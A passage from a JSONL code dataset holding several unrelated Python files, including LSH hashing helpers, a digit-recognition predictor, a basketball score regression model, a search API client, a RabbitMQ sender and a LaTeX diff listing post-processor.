else controler, name if controler else \"default\")(x())\n def __console(*args, **kwargs):\n # print(args, kwargs)\n return result(func)\n return __console\n return control\n\nclass OperationDefault(object):\n \"\"\"默认的操作模块\n\n \"\"\"\n @classmethod\n def default(cls, response):\n \n return response\n\n\n\n \n\n\ndef _parent_resoves():\n level_one = db.query(\"SELECT * FROM company_menu WHERE is_deleted=0 AND level=1\")\n level_two = db.query(\"SELECT * FROM company_menu WHERE is_deleted=0 AND level=2\")\n\n level_one_dict = {}\n for item in level_one:\n item[\"data\"] = []\n level_one_dict[item[\"id\"]] = item\n\n for item in level_two:\n if item[\"parent_id\"] in level_one_dict.keys():\n \n level_one_dict[item[\"parent_id\"]][\"data\"].append(item)\n\n return level_one_dict\n\n\ndef parse(regions):\n parent_2_children = {}\n data = []\n for item in regions:\n children = parent_2_children.get(item['parent_id'], [])\n children.append(item)\n parent_2_children[item['parent_id']] = children\n \n for root in parent_2_children[0]:\n data.append(build(root, parent_2_children))\n return data\n\ndef build(root, parent_2_children):\n\tnode = {}\n\tnode['id'] = root['id']\n\tnode['name'] = root['name']\n\tif root['id'] in parent_2_children:\n\t\tnode['list'] = []\n\t\tfor item in parent_2_children[root['id']]:\n\t\t\tnode['list'].append(build(item, parent_2_children))\n\treturn node\n","sub_path":"server/utils/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249585663","text":"import random\n\ndef isPrime(num):\n if num == 1:\n return False\n for divider in range(2, num):\n if num % divider == 0:\n return False\n return True\n\ndef smallestPrime(num):\n while(1):\n num = num + 1\n if isPrime(num):\n return num\n\ndef generateHashs(n, m):\n \"\"\"\n generate a list of hash functions\n :n - number of hash functions we want to generate\n :m - number of attributes\n \"\"\"\n random.seed(12)\n ab = []\n for i in range(2*n):\n n1 = random.randint(1,m)\n if n1 not in ab:\n ab.append(n1)\n\n a_list = ab[:n]\n b_list = ab[n:]\n m_new = smallestPrime(m)\n \n # print('ab list length:', len(ab))\n # print('the prime number m_new:', m_new)\n\n def generateHash(i):\n a = a_list[i]\n b = b_list[i]\n def hashfunc(x):\n return (a * hash(x) + b) % m_new\n return hashfunc\n return [generateHash(i) for i in range(n)]\n\ndef generateHashForLSH(r):\n random.seed(8)\n l_ = []\n for i in range(r):\n a = random.randint(1, 10000)\n if a not in l_:\n l_.append(a)\n\n def h(l):\n # l - list of integers\n l_len = len(l)\n sum_ = 0\n for i in range(l_len):\n sum_ = sum_ + l_[i] * l[i]\n return sum_ % 50000\n return h\n\nclass Rename():\n \"\"\"\n every value should be distinct\n \"\"\"\n def __init__(self, values):\n \"\"\"\n values - a list of values\n \"\"\"\n self.values = list(values)\n self.values_length = len(values)\n \n def getNewValue(self, original_value):\n try:\n new_value = self.values.index(original_value)\n except ValueError:\n return None\n return new_value\n \n def getOriginalValue(self, new_value):\n try:\n original_value = self.values[new_value]\n except IndexError:\n return None\n return original_value","sub_path":"assignment/assignment3/python/final/task3support.py","file_name":"task3support.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"553027972","text":"import os\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport matplotlib\nimport my_app.processing as proc\nfrom tensorflow.keras import models\nimport matplotlib.pyplot as plt\nimport pickle\nimport pandas as pd\nimport shutil\n\n\nfrom math import ceil\nfrom skimage import io\nfrom skimage import filters, color\nfrom scipy import ndimage as ndi\nfrom PIL import Image\n\nmatplotlib.rcParams.update({'figure.max_open_warning': 0})\n\n\ndef predict_tf(tf_model, image):\n \"\"\"\n Given a trained model, will return an array of predicted digit classifications.\n Args:\n tf_model (keras.models): \n image (str)\n \"\"\"\n matname = 'data/predictions__img'\n print('processing ', image)\n binary_arr, label_arr, segments, orig = \\\n proc.label_segments(image, matname, photo=False, marker=False)\n# os.remove(image)\n predicted = []\n fig, axes = plt.subplots(len(segments), figsize=(6, 6*len(segments)))\n for seg, ax in list(zip(segments, axes.flatten())):\n found = label_arr == seg\n x, y = np.where(found)\n xmin, xmax, ymin, ymax = np.min(x), np.max(x), np.min(y), np.max(y)\n xlen, ylen = found[xmin:xmax, ymin:ymax].shape\n diff = np.abs(ylen-xlen)\n change = ceil(diff/2)\n if diff != 0:\n if ylen > xlen:\n xmin -= change\n xmax += change\n\n else:\n ymin -= change\n ymax += change\n\n xlen, ylen = xmax-xmin, ymax-ymin\n diff = np.abs(ylen-xlen)\n if xlen > ylen: \n ymax += diff\n elif ylen > xlen: \n xmax += diff\n digit = binary_arr[xmin:xmax, ymin:ymax]\n digit = np.pad(digit, int(len(digit)*.2), mode= 'constant', constant_values=(0,0)) \n if digit.shape[0]<10:\n ax.set_visible(False) \n pass\n else:\n ax.imshow(digit,cmap='gray')\n im = Image.fromarray(np.array(digit)*255.0).convert(\"RGB\")\n im.save('000.jpg')\n img = cv2.resize(cv2.imread('000.jpg',cv2.IMREAD_GRAYSCALE),(28,28),interpolation=cv2.INTER_CUBIC)\n os.remove('000.jpg')\n p = np.argmax(tf_model.predict(img.astype(float).flatten().reshape((1, 28, 28, 1))))\n ax.set_title(p)\n im.save(matname+'___predicted____'+str(p)+'.jpg')\n predicted.append([ymin,p])\n\n predicted.sort() \n predicted = [pr[1] for pr in predicted]\n plt.close('all')\n return predicted\n\n\n\nif __name__ == \"__main__\":\n # tf_model = keras.models.load_model('static/mnist_hasyv2_master_20epochs_batch64_201911081573209782.h5') #tf_model.h5\n # oldfilename = '/home/nina/Downloads/imagename.png'\n # filename = '/home/nina/autograder/my_app/imagename.png'\n # shutil.move(oldfilename,filename)\n # predictions = predict_tf(tf_model,filename)\n # print(predictions)\n pass\n","sub_path":"my_app/predict1.py","file_name":"predict1.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"544491537","text":"#coding=utf8\nclass Animal:\n def eat(self):\n print(\"eat\")\n def run(self):\n print(\"run\")\n\nclass Dog(Animal):\n def bark(self):\n print(\"wang\")\n def run(self):\n super().eat()\n Animal.eat(self)\n\n\n\n\n\nwangcai = Dog()\nwangcai.eat()\nwangcai.bark()\nwangcai.run()\n\nprint(\"你好\")\n\n\n\ntry:\n pass\n # num = int(input(\"input\"))\nexcept ZeroDivisionError:\n print(\"请输入正确的整数\")\nexcept Exception as res:\n print(\"未知错误 %s\"%res)","sub_path":"OOP/extends_demo.py","file_name":"extends_demo.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184878754","text":"import UnifiedTestBed as UTB\n'''\nprint(\"Let's run some K-Armed Bandits \\n\")\nprint(\"First let's get some parameters \\n\")\nprint(\"The defaults are 100 iterations of 5000 pulls of a 10-Armed Bandit using UCB\\n\")\nk = input(\"How many arms? :\")\nl = input(\"\\nHow many times should it pull arms? :\")\nn = input(\"\\nHow many iterations? :\")\nprint(\"\\nWhich algorithm? (1 = UCB, 2 = LRI, 3 = LRP )\")\nAlgorithm = input(\":\")\ntest = UTB.TestBed(int(n), int(k), int(l), int(Algorithm))\n'''\n\ntest = UTB.TestBed(100, 10, 5000, 1)\ntest = UTB.TestBed(100, 10, 5000, 2)\ntest = UTB.TestBed(100, 10, 5000, 3)\nprint(\"\\nAll done, the test file and graphs should be in your folder\\n\")\n","sub_path":"Nik's WIP/UserInterface.py","file_name":"UserInterface.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"591328966","text":"def getDigits(N):\r\n ans = set()\r\n while N > 0:\r\n ans.add(N % 10)\r\n N //= 10\r\n return ans\r\n\r\n\r\ndef brute(N):\r\n if N == 0:\r\n return \"INSOMNIA\"\r\n x = N\r\n soFar = getDigits(x)\r\n while len(soFar) != 10:\r\n x += N\r\n soFar = soFar.union(getDigits(x))\r\n # print(str(soFar)+\" \"+str(x))\r\n return x\r\n\r\nT = int(input())\r\nfor i in range(T):\r\n inN = int(input())\r\n print(\"Case #{0}: {1}\".format(i+1, brute(inN)))\r\n","sub_path":"codes/CodeJamCrawler/16_0_1/PLUkraine/gcj1.py","file_name":"gcj1.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"226879814","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\vbox\\vm\\library.py\n# Compiled at: 2013-03-15 12:05:06\nimport re\nfrom . import base, vm\n\nclass VmLibrary(base.VirtualBoxEntityType):\n cls = vm.VM\n\n def _nameGen(self, basename, autoname):\n if basename:\n name = basename\n else:\n name = 'unnamed_machine'\n existing = [ vm.name for vm in self.list() ]\n if name not in existing:\n yield name\n if not autoname:\n raise Exception(('Virtual machine {!r} already exists.').format(name))\n idx = 1\n genName = lambda : ('{} ({})').format(name, idx)\n while genName() in existing:\n idx += 1\n\n while True:\n yield genName()\n idx += 1\n\n def create(self, autoname=True, ostype=None, **kwargs):\n super(VmLibrary, self).create()\n name = kwargs.pop('name', None)\n if ostype:\n found = self.vb.info.ostypes.find(ostype)\n if not found:\n raise Exception(('OS type {!r} not found').format(ostype))\n kwargs['ostype'] = found.id\n nameGen = self._nameGen(name, autoname)\n while True:\n kwargs['name'] = nameGen.next()\n try:\n out = self.vb.cli.manage.createvm(**kwargs)\n except cli.CmdError as err:\n if 'already exists' in err.output.lower():\n continue\n else:\n raise\n else:\n break\n\n out = self.cli.util.parseParams(out)\n return self.get(out['Settings file'])\n\n cloneMsgRe = re.compile('^Machine has been successfully cloned as \"(.*)\"\\\\s*$', re.I | re.M)\n\n def clone(self, source, autoname=True, **kwargs):\n if 'name' in kwargs:\n gen = self._nameGen(kwargs['name'], autoname)\n kwargs['name'] = gen.next()\n out = self.vb.cli.manage.clonevm(source, **kwargs)\n match = self.cloneMsgRe.search(out)\n assert match, repr(out)\n machineName = match.group(1)\n return self.get(machineName)\n\n def listRegisteredIds(self):\n return self.vb.cli.manage.list.vms().values()","sub_path":"pycfiles/vbox-0.2.5-py2.7/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"35346157","text":"# pylint: disable=C0301\r\n# pylint: disable=line-too-long\r\n\"\"\"\r\nttflmodels.py\r\n Script contenant les fonctions de clustering utilisées pour la prédiction.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport statsmodels.formula.api as sm\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics import mean_absolute_error\r\nfrom constant import VERBOSE, NB_DAYS_AVG, SEASON_AVG\r\n# from tools import load_calendar\r\nfrom collections.abc import Callable\r\nimport pickle\r\n\r\n\r\ndef cluster_position_team(_df: pd.DataFrame, _fields_for_ttfl_estim, _kmeans: int = 4,\r\n _num: bool = False) -> pd.DataFrame:\r\n \"\"\"\r\n Cette fonction permet de calculer les clusters de Poste x Adversaire.\r\n\r\n Parameters\r\n ----------\r\n _df: pd.DataFrame\r\n Le DataFrame contenant les données des joueurs.\r\n _fields_for_ttfl_estim: [\"str\"]\r\n La liste des champs à utiliser pour estimer le score TTFL.\r\n _kmeans: int\r\n Le nombre de clusters.\r\n _num: bool\r\n Définition des clusters en numérique (True) ou catégoriel.\r\n\r\n Return\r\n ------\r\n clusters: pd.DataFrame\r\n Le DataFrame contenant le cluster associé à chaque Adversaire x Poste.\r\n columns=['Adversaire', 'Poste', 'Cluster']\r\n \"\"\"\r\n if VERBOSE:\r\n print(f\"Estimation de du score TTFL avec : {', '.join(_fields_for_ttfl_estim)}\")\r\n print(f\"Répartition des Adverdaires x Postes sur {_kmeans} clusters.\")\r\n # Copie du DF pour éviter de l'alterer\r\n clusters = _df.copy()\r\n # Estimation du score TTFL et évaluation des écarts\r\n clusters[\"Diff\"] = clusters[\"TTFL\"] - sm.ols(formula=f\"TTFL~{'+'.join(_fields_for_ttfl_estim)}\",\r\n data=clusters).fit().predict(clusters)\r\n # Regroupement pas Poste et Adversaire\r\n clusters = clusters.groupby(by=[\"Poste\", \"Adversaire\"]).mean([\"Diff\"])[\"Diff\"].reset_index()\r\n\r\n # Analyse du nombre de cluster optimal\r\n # sum_of_squared_distances = []\r\n # nb_clusters = range(1, 15)\r\n # for k in nb_clusters:\r\n # km4 = KMeans(n_clusters=k)\r\n # km = km4.fit(np.array(nba_stat_cluster_moyen).reshape(-1, 1))\r\n # sum_of_squared_distances.append(km.inertia_)\r\n\r\n # plt.plot(nb_clusters, sum_of_squared_distances, 'bx-')\r\n # plt.xlabel('k')\r\n # plt.ylabel('Sum of squared distances')\r\n # plt.title('Elbow Method For Optimal k')\r\n # plt.show()\r\n\r\n clusters[\"Cluster\"] = KMeans(n_clusters=_kmeans).fit_predict(\r\n np.array(clusters[\"Diff\"]).reshape(-1, 1)).astype(str)\r\n\r\n if _num:\r\n clusters[\"Cluster\"] = clusters[\"Cluster\"].apply(\r\n lambda x: clusters['Diff'][clusters['Cluster'] == x].mean())\r\n else:\r\n clusters[\"Cluster\"] = clusters[\"Cluster\"].apply(lambda x: f\"C{str(x)}\")\r\n return clusters.drop(\"Diff\", axis=1)\r\n\r\n\r\ndef get_mat_ttfl_predict(_data: pd.DataFrame, _calendar: pd.DataFrame, _clusters: pd.DataFrame,\r\n _model: Callable or str, _fields_for_ttfl_estim: dict) \\\r\n -> tuple[pd.DataFrame, pd.DataFrame]:\r\n \"\"\"\r\n Cette fonction permet de renvoyer la matrice contenant les prédictions du score TTFL en fonction d'une certaine\r\n méthode de calcul et d'une formule de prédiction.\r\n\r\n Parameters\r\n ----------\r\n _data: pd.DataFrame\r\n Le DataFrame contenant les données des joueurs.\r\n _calendar: pd.DataFrame\r\n Le calendrier à venir sous forme de DataFrame.\r\n _clusters: pd.DataFrame\r\n Les clusters en fonction du poste et de l'adversaire\r\n _model: Callable or str\r\n La fonction contenant le type de modèle à utiliser. \r\n Si Callable, utilisation de la fonction, si str chargement du pickle\r\n _fields_for_ttfl_estim: dict\r\n Le dictionnaire qui possède comme clé l'ensemble des variables à utiliser pour modéliser TTFL.\r\n Les valeurs associées sont les noms des champs à utiliser dans _data pour chacune des variables.\r\n Si une variable ne se situe pas dans _data, alors utiliser None comme valeur.\r\n\r\n Return\r\n ------\r\n clusters: pd.DataFrame\r\n Le DataFrame contenant la matrice Joueur x Date avec les prédictions associées\r\n \"\"\"\r\n # Calcul du model\r\n if isinstance(_model, str):\r\n reg = pickle.load(open(_model, 'rb'))\r\n if VERBOSE:\r\n print(f\"Modèle utilisé : TTFL~{'+'.join(_fields_for_ttfl_estim.keys())}\")\r\n print(\r\n f\"RMSE regression avec Clustering : {np.sqrt(np.mean((_data['TTFL'] - reg.predict(_data)) ** 2))}\")\r\n print(\r\n f\"MAE regression avec Clustering : {mean_absolute_error(_data['TTFL'][~reg.predict(_data).isna()], reg.predict(_data)[~reg.predict(_data).isna()])}\")\r\n print(reg.summary())\r\n\r\n else:\r\n reg = _model(formula=f\"TTFL~{'+'.join(_fields_for_ttfl_estim.keys())}\", data=_data).fit()\r\n if VERBOSE:\r\n print(f\"Modèle utilisé : TTFL~{'+'.join(_fields_for_ttfl_estim.keys())}\")\r\n print(\r\n f\"RMSE regression avec Clustering : {np.sqrt(np.mean((_data['TTFL'] - reg.predict(_data)) ** 2))}\")\r\n print(\r\n f\"MAE regression avec Clustering : {mean_absolute_error(_data['TTFL'], reg.predict(_data))}\")\r\n print(reg.summary())\r\n\r\n # Sélection des colonnes\r\n cols_to_keep = [\"ID\", \"Equipe\", \"Poste\"]\r\n cols_to_keep.extend([x for x in _fields_for_ttfl_estim.values() if x is not None])\r\n last_nba_stat = _data.sort_values([\"ID\", \"Date\"]).groupby(\"ID\").last().reset_index()[\r\n cols_to_keep]\r\n\r\n # Prédiction des matchs\r\n base_predict = pd.concat([\r\n _calendar.rename(columns={\"Dom\": \"Equipe\", 'Ext': 'Adversaire'}).merge(\r\n last_nba_stat, \"left\", on=\"Equipe\").assign(Lieu_DOM=1),\r\n _calendar.rename(columns={\"Ext\": \"Equipe\", 'Dom': 'Adversaire'}).merge(\r\n last_nba_stat, \"left\", on=\"Equipe\").assign(Lieu_DOM=0)\r\n ]).merge(_clusters, 'left', on=['Adversaire', 'Poste']).set_index(\"ID\").rename(\r\n columns={v: k for k, v in _fields_for_ttfl_estim.items() if v is not None})\r\n base_predict = base_predict.reset_index()\r\n base_predict[\"Pred\"] = reg.predict(base_predict)\r\n base_predict = base_predict.set_index(\"ID\")\r\n base_impact = base_predict.copy()\r\n base_impact['Impact adversaire'] = base_impact['Cluster'] * reg.params['Cluster']\r\n base_impact['Impact forme'] = base_impact[\r\n \"TTFL\" + str(NB_DAYS_AVG) + \"jover\" + str(SEASON_AVG)] * \\\r\n reg.params[\"TTFL\" + str(NB_DAYS_AVG) + \"jover\" + str(SEASON_AVG)]\r\n base_impact['Impact domicile'] = base_impact['Lieu_DOM'] * reg.params['Lieu_DOM']\r\n return (\r\n base_predict.reset_index().pivot_table(values=\"Pred\", index=\"ID\", columns=\"Date\",\r\n fill_value=0),\r\n base_impact\r\n )\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"496986373","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^orders/settlement/$', views.OrdersSettle.as_view(), name='settlement'),\n url(r'^orders/commit/$', views.OrdersCommit.as_view(), name='commit'),\n url(r'^orders/success/$', views.OrdersSuccess.as_view(), name='success'),\n url(r'^orders/comment/$', views.CommentView.as_view(), name='comment'),\n url(r'^comments/(?P\\d+)/$', views.GoodsComment.as_view(), name='goodscomment'),\n\n]\n","sub_path":"meiduomall/meiduomall/apps/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"604457771","text":"# import numpy as np\r\n# import pandas as pd\r\n# from pandas import Series\r\n# from pandas import DataFrame\r\n#\r\n#\r\n# data=pd.read_csv(r'D:\\python视频\\trajectories-0750am-0805am_steer.csv',nrows=6000)\r\n# frame=DataFrame(data)\r\n# index=frame.index\r\n# movement=[]\r\n# frame_add=DataFrame(np.zeros((5000,4)).astype(np.float),index=np.arange(5000),columns=[ 'front_v_Vel','front_v_Acc',\\\r\n# 'behind_v_Vel','behind_v_Acc'])\r\n#\r\n# # pd.set_option('display.max_columns', None)\r\n# # pd.set_option('display.max_rows', None)\r\n# #转换为numpy数组\r\n# #获取车辆当前车道位置\r\n# lane_id=frame.loc[:,'Lane_ID']\r\n# lane_id=np.array(list(lane_id))\r\n# #获取帧标识号\r\n# frame_id=frame.loc[:,'Frame_ID']\r\n# frame_id=np.array(list(frame_id))\r\n# #获取车辆识别号\r\n# vehicle_id=frame.loc[:,'Vehicle_ID']\r\n# vehicle_id=np.array(list(vehicle_id))\r\n#\r\n# #遍历赋值\r\n# for i in range(5000):\r\n# #第一问 移动状态\r\n# if lane_id[i]==lane_id[i+1]:\r\n# movement.append('TH')\r\n# elif lane_id[i]>lane_id[i+1]:\r\n# movement.append('LT')\r\n# else:\r\n# movement.append('RT')\r\n# #第二问:前后车速度和及速度\r\n# if frame.loc[i,'Preceding']!=0:\r\n# #如果前方有车 获取前方车辆id 和当前帧数\r\n# front_id=frame.loc[i,'Preceding']\r\n# local_time=frame.loc[i,'Frame_ID']\r\n# bo1 = (vehicle_id == front_id)\r\n# bo2 = (frame_id == local_time)\r\n# print(bo1.sum())\r\n# print(bo2.sum())\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Vel'], 0)\r\n# frame_add.loc[i,'front_v_Vel']=arr.sum()\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Acc'], 0)\r\n# frame_add.loc[i, 'front_v_Acc'] = arr.sum()\r\n# else:\r\n# pass\r\n# # 如果后方有车 获取后方车辆id 和当前帧数\r\n# behind_id = frame.loc[i, 'Vehicle_ID']\r\n# local_time = frame.loc[i, 'Frame_ID']\r\n# bo1 = (vehicle_id == behind_id)\r\n# bo2 = (frame_id == local_time)\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Vel'], 0)\r\n# frame_add.loc[i, 'behind_v_Vel'] = arr.sum()\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Acc'], 0)\r\n# frame_add.loc[i, 'behind_v_Acc'] = arr.sum()\r\n#\r\n# #合并写入新文件\r\n# frame_add.insert(0,'movement',np.array(movement))\r\n# df=pd.concat([frame,frame_add],axis=1)\r\n# df.to_csv(r'D:\\python视频\\add.csv')\r\n# print(df)\r\n#\r\n#\r\n#\r\n\r\n\r\nimport pandas as pd\r\ndata=pd.read_csv(r'D:\\python视频\\trajectories-0750am-0805am_steer.csv')\r\n#print(data.head)\r\n#print(data.shape)\r\nvehicle_id=data['Vehicle_ID']\r\nlane_id=data['Lane_ID']\r\n# for i in range(4999):\r\n# if vehicle_id[i]==vehicle_id[i+1]:\r\n# if lane_id[i]==lane_id[i+1]:\r\n# data.loc[i,'Movement']=1\r\n# elif lane_id[i]>lane_id[i+1]:\r\n# data.loc[i,'Movement']=2\r\n# else:\r\n# data.loc[i,'Movement']=3\r\n# else:\r\n# data.loc[i, 'Movement'] = 1\r\n# data.to_csv(r'D:\\python视频\\movement.csv')\r\n\r\nfor i in range(5000):\r\n pre_id=data.loc[i,'Preceding']\r\n frame_id=data.loc[i,'Frame_ID']\r\n if pre_id!=0:\r\n #布尔索引\r\n data_temp=data[(data['Vehicle_ID']==pre_id)&(data['Frame_ID']==frame_id)]\r\n if len(data_temp)!=0:\r\n data.loc[i,'Pre_v_Vel']=data_temp.loc[data_temp.index[0],'v_Vel']\r\n data.loc[i,'Pre_V_Acc']=data_temp.loc[data_temp.index[0],'v_Acc']\r\n data.loc[data_temp.index[0],'Back_v_Vel']=data.loc[i,'v_Vel']\r\n data.loc[data_temp.index[0], 'Back_v_Acc'] = data.loc[i,'v_Acc']\r\ndata.to_csv(r'D:\\python视频\\ac.csv')","sub_path":"20200322_作业.py","file_name":"20200322_作业.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186037840","text":"from marshmallow_sqlalchemy import SQLAlchemySchema, auto_field, SQLAlchemyAutoSchema\nfrom sqlalchemy.orm import session\n\nfrom DirFile.DBGlaobal.context import DbSessionFactory\nfrom DirFile.Model.playerPoints import Point\nfrom DirFile.Model.players import Player\nfrom sqlalchemy.orm import scoped_session, sessionmaker, relationship, backref, session\n\n\nclass PointSchema(SQLAlchemySchema):\n class Meta:\n model = Point\n load_instance = True\n poitId = auto_field()\n score = auto_field()\n gameName = auto_field()\n created = auto_field()\n isPlayed = auto_field()\n\n\nclass PlayerSchema(SQLAlchemySchema):\n class Meta:\n model = Player\n load_instance = True\n id = auto_field()\n username = auto_field()\n password = auto_field()\n print(username)\n\n\n# session = DbSessionFactory.create_session()\n#\n# # Desiralization\n# player = Player(username=\"Said H F\")\n# player_schema = PlayerSchema()\n# point = Point(gameName=\"JustPlay\")\n# session.add(point)\n# session.add(player)\n# session.commit()\n# dump_data = player_schema.dump(player)\n# print(dump_data)\n","sub_path":"DirFile/SerialMash/mashallin.py","file_name":"mashallin.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"423677581","text":"#!/usr/bin/env python\nimport os\nimport pika\nimport logging\nfrom logging.config import dictConfig\nfrom rabbit_python import config\n\n\ndef main():\n logging.info(\"main\")\n logging.info(\"connecting to rabbit\")\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=config.host, port=config.port)\n )\n\n channel = connection.channel()\n\n channel.queue_declare(queue=\"hello\")\n\n channel.basic_publish(exchange=\"\", routing_key=\"hello\", body=\"Hello World!\")\n logging.info(\" [x] Sent 'Hello World!'\")\n connection.close()\n\n\nif __name__ == \"__main__\":\n os.makedirs(config.logging_dir, exist_ok=True)\n dictConfig(config.logging_config_dict)\n main()\n","sub_path":"src/hello/send/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460320924","text":"# -*- coding: utf-8 -*-\n#-----------------------------------------------------------------------------\n# Copyright (c) 2012, Techunits\n#\n# Distributed under the terms of the MIT License\n#-----------------------------------------------------------------------------\n\nimport logging\nimport urllib\nimport urllib2\nimport json\n\nfrom mahs.exception import *\n#from lxml import etree\n\nlog = logging.getLogger('mahs')\n\nclass MaHSAPI(object):\n \n def __init__(self, apiKey, apiSecretKey):\n self.currentUserAgent = 'MaHS-Python-Client-1.0.1'\n apiUrl = 'http://api.mongolantern.techunits.com'\n \n if not apiUrl:\n raise MaHSInitializationError('API URL not specified.')\n else:\n self.apiUrl = apiUrl\n\n if not apiKey:\n raise MaHSInitializationError('API Key not specified.')\n else:\n self.apiKey = apiKey\n\n if not apiSecretKey:\n raise MaHSInitializationError('Secret Key not specified.')\n else:\n self.apiSecretKey = apiSecretKey\n\n\n # show curent object for debug purposes\n def printObjectDebugInfo(self):\n print(self)\n quit()\n \n \n def setQuery(self, queryObject):\n self.apiUrl += '/query'\n self.queryObject = queryObject\n \n \n def executeCall(self):\n if self.queryObject is not None:\n httpGetData = urllib.urlencode({\n 'apiKey': self.apiKey,\n 'apiSecret': self.apiSecretKey,\n 'indexBase': self.queryObject.searchIndex,\n 'keyword': self.queryObject.keyword,\n 'sortMode': self.queryObject.sortMode,\n 'matchMode': self.queryObject.matchMode,\n })\n httpHeaders = {\n 'User-Agent' : self.currentUserAgent\n }\n self.apiUrl += '?'+httpGetData\n requestObject = urllib2.Request(self.apiUrl, None, httpHeaders)\n try:\n response = urllib2.urlopen(requestObject)\n responseObj = json.loads(response.read())\n return responseObj;\n except urllib2.HTTPError as e:\n print('Invalid API url. HTTP Error code: ' + str(e.code))\n \n \n else:\n raise MaHSRequestError('Missing QueryObject. Not yet implemented')\n \n \n \n \n \n \n\n","sub_path":"mahs/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"28201469","text":"#!/usr/bin/env python3\n\nimport sys\n\ninputDiff = sys.argv[1]\noutputDiff = sys.argv[2]\n\n#with open(\"OMG_OntoIOp_current-diff2e94c79.tex\", \"r\") as readDiff:\nwith open(inputDiff, \"r\") as readDiff:\n \n# with open(\"OMG_diff.tex\", \"w\") as writeDiff:\n with open(outputDiff, \"w\") as writeDiff:\n begin_listing = r\"\\begin{lstlisting}\"\n end_listing = \"\\end{lstlisting}\"\n\n begin_delete = \"\\DIFdelbegin\"\n end_delete = \"\\DIFdelend\" \n\n begin_add = \"\\DIFaddbegin\"\n end_add = \"\\DIFaddend\"\n\n begin_listing_flag = \"false\"\n end_listing_flag = \"false\"\n \n# begin_delete_count = 0\n# end_delete_count = 0\n\n# begin_add_count = 0\n# end_add_count = 0\n\n exist_escape_1 = \"escapeinside={()}\"\n exist_escape_2 = \"escapeinside={<>}\"\n \n escape_strings = '''\\lstset{escapeinside = {*@}{@*}}\n''' \n\n for line in readDiff:\n if begin_listing in line: # search \\begin{lstlisting}\n begin_listing_flag = \"true\" # note the start of lstlisting\n end_listing_flag = \"false\" # \\end{lstlisting} not reached \n if exist_escape_1 in line:\n first_escape = \" ( \"\n second_escape = \" ) \"\n elif exist_escape_2 in line:\n first_escape = \" < \"\n second_escape = \" > \"\n else:\n first_escape = \" *@ \"\n second_escape = \" @* \"\n line = line.replace(line, escape_strings + line) # set escape string to escape to latex \n if end_listing in line: # search \\end{lstlisting}\n end_listing_flag = \"true\" # end of \\begin{lstlisting} is reached \n begin_listing_flag = \"false\" # note the finish of lstlisting\n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and begin_delete in line: # search \\DIFdelbegin in the line \n line = line.replace(begin_delete, first_escape + begin_delete) # add escape string to escape to latex to execute \\DIFdel\n# begin_delete_count = begin_delete_count + 1 \n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and end_delete in line: # search \\DIFdelend in the line \n line = line.replace(end_delete, end_delete + second_escape) # add escape string to return to the lstlisting environment\n# end_delete_count = end_delete_count + 1 \n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and begin_add in line: # search \\DIFaddbegin in the line \n line = line.replace(begin_add, first_escape + begin_add) # add escape string to escape to latex to execute \\DIFadd\n# begin_add_count = begin_add_count + 1 \n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and end_add in line: # search \\DIFaddend in the line\n line = line.replace(end_add, end_add + second_escape) # add escape string to return to the lstlisting environment\n# end_add_count = end_add_count + 1 \n\n writeDiff.write(line)\n\n#print begin_delete_count\n#print end_delete_count\n#print begin_add_count\n#print end_add_count\n\n\n \nreadDiff.close()\nwriteDiff.close()\n\n\n\n\n#\\lstset{\n# escapeinside={(*@}{@*)}, \n#}\n\n\n\n \n","sub_path":"Standard/listing_highlight.py","file_name":"listing_highlight.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"102359096","text":"#another example - 